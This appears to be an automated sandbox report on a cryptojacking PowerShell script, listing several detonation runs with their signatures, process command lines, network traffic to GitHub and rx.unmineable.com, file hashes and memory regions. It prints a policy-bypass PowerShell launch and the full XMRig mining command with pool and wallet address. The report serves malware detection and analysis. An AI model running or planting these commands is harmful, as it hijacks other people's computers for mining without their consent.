
Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
BE 88.221.83.235:443 www.bing.com tcp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 235.83.221.88.in-addr.arpa udp
BE 88.221.83.235:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 66.112.168.52.in-addr.arpa udp

Files

memory/2216-0-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_trfhy2mu.jxb.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2216-1-0x0000022BF4820000-0x0000022BF4842000-memory.dmp

memory/2216-11-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/2216-12-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/2216-14-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/2216-15-0x0000022BF6FC0000-0x0000022BF6FD2000-memory.dmp

memory/2216-16-0x0000022BF4860000-0x0000022BF486A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3000-47-0x00000275D7CD0000-0x00000275D7CF0000-memory.dmp

memory/3000-48-0x00000275D7D10000-0x00000275D7D30000-memory.dmp

memory/3000-49-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-50-0x00000275D7D30000-0x00000275D7D50000-memory.dmp

memory/3000-51-0x00000275D7D50000-0x00000275D7D70000-memory.dmp

memory/2216-53-0x00007FFF0B583000-0x00007FFF0B585000-memory.dmp

memory/3000-52-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/2216-54-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3000-55-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/2216-56-0x00007FFF0B580000-0x00007FFF0C041000-memory.dmp

memory/3000-59-0x00000275D7D50000-0x00000275D7D70000-memory.dmp

memory/3000-58-0x00000275D7D30000-0x00000275D7D50000-memory.dmp

memory/3000-57-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-60-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-61-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-62-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-63-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-64-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-65-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-66-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-67-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-68-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-69-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-70-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-71-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-72-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-73-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-74-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-75-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-76-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-77-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-78-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-79-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-80-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-81-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-82-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-83-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-84-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-85-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-86-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-87-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-88-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-89-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-90-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-91-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-92-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-93-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-94-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-95-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-96-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-97-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-98-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-99-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-100-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-101-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-102-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-103-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-104-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-105-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-106-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-107-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-108-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-109-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-110-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-111-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-112-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-113-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-114-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-115-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-116-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-117-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

memory/3000-118-0x00007FF7B4400000-0x00007FF7B5033000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:22

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1782s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 26.73.42.20.in-addr.arpa udp
US 8.8.8.8:53 242.137.73.23.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

memory/908-0-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/908-5-0x000001FABBC90000-0x000001FABBCB2000-memory.dmp

memory/908-6-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-9-0x000001FAD42F0000-0x000001FAD4366000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mpehszfz.mdt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/908-10-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-25-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-48-0x000001FAD42B0000-0x000001FAD42C2000-memory.dmp

memory/908-61-0x000001FABBD00000-0x000001FABBD0A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4444-90-0x000001C1BF750000-0x000001C1BF770000-memory.dmp

memory/4444-91-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-92-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/908-93-0x00007FF98AAA3000-0x00007FF98AAA4000-memory.dmp

memory/908-94-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/908-95-0x00007FF98AAA0000-0x00007FF98B48C000-memory.dmp

memory/4444-96-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-97-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-98-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-99-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-100-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-101-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-102-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-103-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-104-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-105-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-106-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-107-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-108-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-109-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-110-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-111-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-112-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-113-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-114-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-115-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-116-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-117-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-118-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-119-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-120-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-121-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-122-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-123-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-124-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-125-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-126-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-127-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-128-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-129-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-130-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-131-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-132-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-133-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-134-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-135-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-136-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-137-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-138-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-139-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-140-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-141-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-142-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-143-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-144-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-145-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-146-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-147-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-148-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-149-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-150-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-151-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-152-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-153-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-154-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-155-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

memory/4444-156-0x00007FF7B4A40000-0x00007FF7B5673000-memory.dmp

Analysis: behavioral15

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:30

Platform

win10v2004-20240426-en

Max time kernel

1799s

Max time network

1761s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (5).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 99.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 89.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
NL 23.62.61.89:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

memory/3664-0-0x00007FFC7C303000-0x00007FFC7C305000-memory.dmp

memory/3664-1-0x00000259E9630000-0x00000259E9652000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_hnyfvmju.11x.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3664-11-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-12-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-14-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/3664-16-0x00000259E96A0000-0x00000259E96AA000-memory.dmp

memory/3664-15-0x00000259EA8A0000-0x00000259EA8B2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4584-47-0x000002648CEB0000-0x000002648CED0000-memory.dmp

memory/4584-48-0x000002648CF00000-0x000002648CF20000-memory.dmp

memory/4584-49-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-50-0x000002648D1D0000-0x000002648D1F0000-memory.dmp

memory/4584-51-0x000002648D1B0000-0x000002648D1D0000-memory.dmp

memory/4584-52-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/3664-53-0x00007FFC7C303000-0x00007FFC7C305000-memory.dmp

memory/3664-54-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/4584-55-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/3664-56-0x00007FFC7C300000-0x00007FFC7CDC1000-memory.dmp

memory/4584-59-0x000002648D1B0000-0x000002648D1D0000-memory.dmp

memory/4584-58-0x000002648D1D0000-0x000002648D1F0000-memory.dmp

memory/4584-57-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-60-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-61-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-62-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-63-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-64-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-65-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-66-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-67-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

memory/4584-68-0x00007FF7DC360000-0x00007FF7DCF93000-memory.dmp

